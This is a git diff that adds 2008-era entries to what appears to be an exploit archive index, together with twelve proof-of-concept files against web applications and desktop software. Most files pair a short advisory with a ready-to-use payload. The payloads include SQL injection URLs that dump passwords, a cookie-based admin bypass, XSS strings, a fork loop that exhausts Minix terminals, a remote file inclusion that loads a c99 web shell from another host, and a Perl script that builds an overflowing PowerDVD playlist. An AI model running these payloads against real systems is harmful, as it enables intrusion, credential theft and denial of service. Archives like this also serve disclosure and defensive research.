diff --git a/files.csv b/files.csv
index 3f7eeccd5..e84b525b7 100755
--- a/files.csv
+++ b/files.csv
@@ -28880,3 +28880,16 @@ id,file,description,date,author,platform,type,port
32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 'admin_lng' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0
+32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 'aa_login' Cookie Parameter Authentication Bypass Vulnerability",2008-07-21,Ciph3r,php,webapps,0
+32103,platforms/php/webapps/32103.txt,"VisualPic 0.3.1 Cross-Site Scripting Vulnerability",2008-07-21,Ciph3r,php,webapps,0
+32105,platforms/windows/dos/32105.pl,"PowerDVD 8.0 '.m3u' and '.pls' File Multiple Buffer Overflow Vulnerabilities",2008-07-22,LiquidWorm,windows,dos,0
+32106,platforms/php/webapps/32106.txt,"Claroline 1.8 learnPath/calendar/myagenda.php Query String XSS",2008-07-22,DSecRG,php,webapps,0
+32107,platforms/php/webapps/32107.txt,"Claroline 1.8 user/user.php Query String XSS",2008-07-22,DSecRG,php,webapps,0
+32108,platforms/php/webapps/32108.txt,"Claroline 1.8 tracking/courseLog.php view Parameter XSS",2008-07-22,DSecRG,php,webapps,0
+32109,platforms/php/webapps/32109.txt,"Claroline 1.8 tracking/toolaccess_details.php toolId Parameter XSS",2008-07-22,DSecRG,php,webapps,0
+32110,platforms/multiple/remote/32110.txt,"Outpost Security Suite Pro 2009 Filename Parsing Security Bypass Vulnerability",2008-07-22,"Juan Pablo Lopez Yacubian",multiple,remote,0
+32111,platforms/asp/webapps/32111.txt,"Pre Survey Generator 'default.asp' SQL Injection Vulnerability",2008-07-22,DreamTurk,asp,webapps,0
+32112,platforms/linux/dos/32112.txt,"Minix 3.1.2a Psuedo Terminal Denial of Service Vulnerability",2008-07-23,kokanin,linux,dos,0
+32113,platforms/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 'username' Parameter SQL Injection Vulnerability",2008-07-23,"Lars Heidelberg",php,webapps,0
+32114,platforms/php/webapps/32114.txt,"AtomPhotoBlog 1.15 'atomPhotoBlog.php' SQL Injection Vulnerability",2008-07-24,Mr.SQL,php,webapps,0
+32116,platforms/php/webapps/32116.txt,"ezContents 'minicalendar.php' Remote File Include Vulnerability",2008-07-25,"HACKERS PAL",php,webapps,0
diff --git a/platforms/asp/webapps/32111.txt b/platforms/asp/webapps/32111.txt
new file mode 100755
index 000000000..dfe425a6f
--- /dev/null
+++ b/platforms/asp/webapps/32111.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30349/info
+
+Pre Survey Generator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/poll/default.asp?catid=1+union+select+0,password+from+users
\ No newline at end of file
diff --git a/platforms/linux/dos/32112.txt b/platforms/linux/dos/32112.txt
new file mode 100755
index 000000000..21ff8607d
--- /dev/null
+++ b/platforms/linux/dos/32112.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/30357/info
+
+Minix is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to prevent users from opening new pseudo terminals, denying service to legitimate users.
+
+Minix 3.1.2a is vulnerable; other versions may also be affected.
+
+$ uname -a
+Minix 192.168.1.2 3 1.2a i686
+$ while true ; do (yes "yes yes minix uh ah"&) ; done
+[snip snip]
+$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C
+
+...disconnected
+telnet 192.168.1.2
+Trying 192.168.1.2...
+Connected to 192.168.1.2.
+Escape character is '^]'.
+I am sorry, but there is no free PTY left!
+Connection closed by foreign host.
\ No newline at end of file
diff --git a/platforms/multiple/remote/32110.txt b/platforms/multiple/remote/32110.txt
new file mode 100755
index 000000000..fc5b5455e
--- /dev/null
+++ b/platforms/multiple/remote/32110.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/30347/info
+
+Outpost Security Suite Pro is prone to a vulnerability that allows an unauthorized attacker to bypass antivirus and firewall rules. This issue occurs because the application fails to adequately sanitize user-supplied input.
+
+Successful exploits can allow malicious data to evade expected detection rules, giving legitimate users a false sense of security. Other attacks may also be possible.
+
+Outpost Security Suite Pro 2009 is vulnerable; other versions may also be affected.
+
+ASCII:
+HEX: 26 23 31 32 32 38 38 3b
+
+The following special character in a filename can evade firewall rules:
+
+ASCII:? ? ? ‣ ․ ‥ ?
+HEX: 86 20 87 20 95 20 26 23 38 32 32 37 3b 20 26 23 38 32 32 38 3b 20
+26 23 38 32 32 39 3b 20 85
\ No newline at end of file
diff --git a/platforms/php/webapps/32102.txt b/platforms/php/webapps/32102.txt
new file mode 100755
index 000000000..4f505fa98
--- /dev/null
+++ b/platforms/php/webapps/32102.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30333/info
+
+AlphAdmin CMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
+
+An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.
+
+AlphAdmin CMS 1.0.5_03 is vulnerable; other versions may also be affected.
+
+javascript:document.cookie = "aa_login=1; path=/";
\ No newline at end of file
diff --git a/platforms/php/webapps/32103.txt b/platforms/php/webapps/32103.txt
new file mode 100755
index 000000000..fff0e2fb1
--- /dev/null
+++ b/platforms/php/webapps/32103.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/30334/info
+
+VisualPic is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+VisualPic 0.3.1 is vulnerable; other versions may be affected as well.
+
+http://www.example.com/visualpic/?login&pic=>">
+http://www.example.com/visualpic/?pic=%00'">
+http://www.example.com/visualpic/?login&pic=>">
\ No newline at end of file
diff --git a/platforms/php/webapps/32106.txt b/platforms/php/webapps/32106.txt
new file mode 100755
index 000000000..b8f8a2db0
--- /dev/null
+++ b/platforms/php/webapps/32106.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30346/info
+
+Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Claroline 1.8.11 are vulnerable.
+
+http://www.example.com/[installdir]/claroline/calendar/myagenda.php?">
\ No newline at end of file
diff --git a/platforms/php/webapps/32107.txt b/platforms/php/webapps/32107.txt
new file mode 100755
index 000000000..8edf7f7f7
--- /dev/null
+++ b/platforms/php/webapps/32107.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30346/info
+
+Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Claroline 1.8.11 are vulnerable.
+
+http://www.example.com/[installdir]/claroline/user/user.php?">
\ No newline at end of file
diff --git a/platforms/php/webapps/32108.txt b/platforms/php/webapps/32108.txt
new file mode 100755
index 000000000..9cd1a0fd7
--- /dev/null
+++ b/platforms/php/webapps/32108.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30346/info
+
+Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Claroline 1.8.11 are vulnerable.
+
+http://www.example.com/[installdir]/claroline/tracking/courseLog.php?view=DSec"
+STYLE="xss:expression(alert('DSecRG XSS'))
\ No newline at end of file
diff --git a/platforms/php/webapps/32109.txt b/platforms/php/webapps/32109.txt
new file mode 100755
index 000000000..e64fe4ee2
--- /dev/null
+++ b/platforms/php/webapps/32109.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30346/info
+
+Claroline is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to Claroline 1.8.11 are vulnerable.
+
+http://www.example.com/[installdir]/claroline/tracking/toolaccess_details.php?toolId=">
\ No newline at end of file
diff --git a/platforms/php/webapps/32113.txt b/platforms/php/webapps/32113.txt
new file mode 100755
index 000000000..f9aaf85df
--- /dev/null
+++ b/platforms/php/webapps/32113.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/30358/info
+
+EMC Centera Universal Access (CUA) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+CUA 4.0_4735.p4 is vulnerable; other versions may also be affected.
+
+Username: valid_user_name
+Password: --
\ No newline at end of file
diff --git a/platforms/php/webapps/32114.txt b/platforms/php/webapps/32114.txt
new file mode 100755
index 000000000..7ceb2e36e
--- /dev/null
+++ b/platforms/php/webapps/32114.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/30360/info
+
+AtomPhotoBlog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+AtomPhotoBlog 1.15b1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,0,0,0,0,0,0,0,0,mail,pass,0+from+user
\ No newline at end of file
diff --git a/platforms/php/webapps/32116.txt b/platforms/php/webapps/32116.txt
new file mode 100755
index 000000000..95688f35d
--- /dev/null
+++ b/platforms/php/webapps/32116.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/30373/info
+
+ezContents CMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
+
+http://www.example.com/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=http://www.example2.com/soqor10/c99.txt?
\ No newline at end of file
diff --git a/platforms/windows/dos/32105.pl b/platforms/windows/dos/32105.pl
new file mode 100755
index 000000000..18775127f
--- /dev/null
+++ b/platforms/windows/dos/32105.pl
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/30341/info
+
+PowerDVD is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.
+
+Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
+
+PowerDVD 8.0 is vulnerable; prior versions may also be affected.
+
+#!/usr/bin/perl
+#
+# CyberLink PowerDVD <= 8.0 Crafted PLS/M3U Playlist File Buffer Overflow Exploit
+# Coded by Gjoko "LiquidWorm" Krstic
+# liquidworm [At] gmail.com
+# http://www.zeroscience.org
+#
+
+$buffer = "J" x 520000;
+
+open(m3u, ">./evil_list.m3u"); # or .pls
+
+print m3u "$buffer";
+
+print "\n--> Evil Playlist created... Have fun!\n";
+
+# July, 2008